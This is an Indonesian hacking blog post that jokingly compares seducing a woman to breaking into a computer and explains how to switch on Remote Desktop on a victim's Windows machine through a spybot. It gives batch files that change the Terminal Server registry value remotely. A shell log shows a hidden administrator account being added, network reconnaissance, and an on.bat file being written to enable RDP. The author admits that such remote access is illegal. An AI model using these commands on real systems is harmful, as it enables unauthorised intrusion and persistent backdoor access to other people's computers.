aktifkan Terminal Server dari spybot

Tidak Semua Yang Kita Pikirkan Akan Sama Dengan Kenyataan, begitulah halnya sebuah system, walaupun tidak mengerti apa arti dari sebuah system, tapi yang Saya tahu Sebuah system memiliki kesamaan dengan seorang wanita.

Untuk mendapatkan Seorang wanita haruslah tahu akan kelemahan serta kebiasaan dari wanita itu, begitulah sebuah system, walaupun tak mengerti apa itu sebuah system dan apa itu seorang wanita.

Sebuah Keindahan dalam sebuah system Wanita Memang suatu keindahan, selain wanita keindahan terdapat pada ciptaan dah mahluk tuhan.


tidak semua komputer remote desktopnya on

Untuk Mendapatkan seorang wanita sama dengan untuk mendapatkan sebuah system, mencari kelemahan serta mengexploit dan kalau perlu menembak dengan beberapa paket sekaligus.. wahaha saya ngomong apaan yahhk.

kok jadinya antara wanita dan sebuah system yahh.. ceritanya neh gimana membuka atau mengaktifkan remote desktop connection agar kita bisa meremote suatu komputer. ya disini sih yang namanya ngeremote tanpa sepengetahuan orang lain artinya ilegal, tapi jangan jangan suka ngerusak hehe walaupun kadang2 klo lagi bt pinginx ngerusak, ach,, lupain itu masa lalu....



Nggak tau maksudnya apaan



Dari Mirc juga dapat di setting, asal berhubungan langsung dengan system


Operating System Windows dapat di remote desktop asal termisal server dalam keadaan on. dan jika ingin mengaktifkan copas saja file di bawah dan simpah dengan file yang ber-ekstensi .bat kemudian jalankan.
:file 1 on.bat
:On mstsc
@reg add "\\hostname\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

:file 2 off.bat
:Off mstsc
@reg add "\\hostname\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Log Files :

cmd.exe has started type "cmd help" for commands
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
F:\Documents and Settings\abc>
net user AnakDompu AnakDompu /add
The command completed successfully.
F:\Documents and Settings\abc>
net localgroup Administrators AnakDompu /add
The command completed successfully.
F:\Documents and Settings\abc>
net view
There are no entries in the list.
F:\Documents and Settings\abc>
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : faysal-******
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : Yes
PPP adapter CYBERSTUDENT:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface
Physical Address. . . . . . . . . : 00-53-45-00-00-00
Dhcp Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 202.163.******
Subnet Mask . . . . . . . . . . . : 255.255.******
Default Gateway . . . . . . . . . : 202.163.******
DNS Servers . . . . . . . . . . . : 202.163.******
202.163.******
NetBIOS over Tcpip. . . . . . . . : Disabled
F:\Documents and Settings\abc>
@echo off > on.bat
echo @echo off > F:\on.bat
echo @reg add "\\faysal-******\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f >> F:\on.bat
echo echo exit >> F:\on.bat
echo exit >> F:\on.bat
cd\
netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP SYN_RECEIVED
TCP ESTABLISHED
TCP ESTABLISHED
TCP ESTABLISHED


sengaja ipna saia sensor
aktifkan Terminal Server dari spybot aktifkan Terminal Server dari spybot Reviewed by Furkan Samadha on 2:14 PM Rating: 5